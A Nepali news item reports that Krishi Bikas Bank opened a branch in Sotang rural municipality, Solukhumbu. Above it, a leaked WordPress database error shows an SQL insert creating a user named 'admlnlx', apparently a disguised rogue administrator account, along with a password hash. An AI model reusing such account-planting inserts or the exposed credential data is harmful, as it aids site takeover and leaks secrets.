WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BbfGOv2.4ZNv6AyvGJmhSTemiKCWmv.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:21:32', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, २२ फाल्गुन, सोलुखुम्बु । सोलुखुम्बु जिल्लाको सोताङ गाँउपालिकामा कृषि विकास बैंकले सेवा सुरु गरेको छ ।
राज्य पून सम्रचना अनुसार प्रतेक स्थानीय तहमा बैकको सुबिधा पुर्याउने राज्यको लक्ष अनुसार मंगलबार गाँउपालिका अध्यक्ष वीर बहादुर राईले सो बैँकको उद्घाटन गरे । राईले बैंक संचालनमा आएपछि बैकिंङ बातावरण सहज हुने बताए ।
कृषि बिकास बैँकको शाखा विस्तार भएसंगै बैकिंङ कारोबारको लागि सल्लेरी धाउनुपर्ने बाध्यता हटेको छ । स्थानीय स्तरका नागरिकमा बचत गर्ने बानीको विकासका साथै विकासका आयोजना कार्यान्वयनका लागि पनि थप सहज हुने अपेक्षा राखिएको छ ।
बैँकले जनमूखि सेवा प्रवाह गर्ने शाखा प्रबन्धक पेसल कुमार दाहालले बताए ।